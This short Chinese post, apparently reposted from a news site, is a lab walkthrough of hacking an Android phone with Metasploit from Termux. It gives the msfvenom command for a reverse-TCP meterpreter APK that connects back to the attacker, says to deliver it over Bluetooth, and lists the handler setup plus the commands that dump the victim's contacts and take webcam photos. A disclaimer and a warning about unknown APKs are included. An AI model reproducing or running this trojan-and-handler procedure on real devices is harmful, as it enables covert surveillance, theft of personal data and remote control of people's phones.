本次滲透為靶機測試。切勿用于非法用途!
攻擊者:192.168.1.3 termux metasploit
受害者:192.168.1.2 Android 5.1 - Linux 3.10.72 (aarch64)
使用模塊:multi/handler
首先生成安卓木馬
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=3800 -o s.apk
将其移動到/storage/emulated/0/360目錄。并使用藍牙發送給受害者者。
受害者安裝即可。回到攻擊者,啟動msfconsole。首先選擇模塊
use exploit multi/handler
設置監聽地址
set lhost 192.168.1.3
設置反彈端口
set lprot 3800
設置playload
set payload android/meterpreter/reverse_tcp
啟動
run
成功。試試執行命令。系統信息。
sysinfo
試試下載通訊錄
dump_contacts
成功保存為txt文件。後面因為長時間未操作自動斷開了。
試試拍照
webcam_snap
成功保存在files目錄下。還有很多危險功能我就不一一說明了。一些來路不明的apk切勿安裝。
,更多精彩资讯请关注tft每日頭條,我们将持续为您更新最新资讯!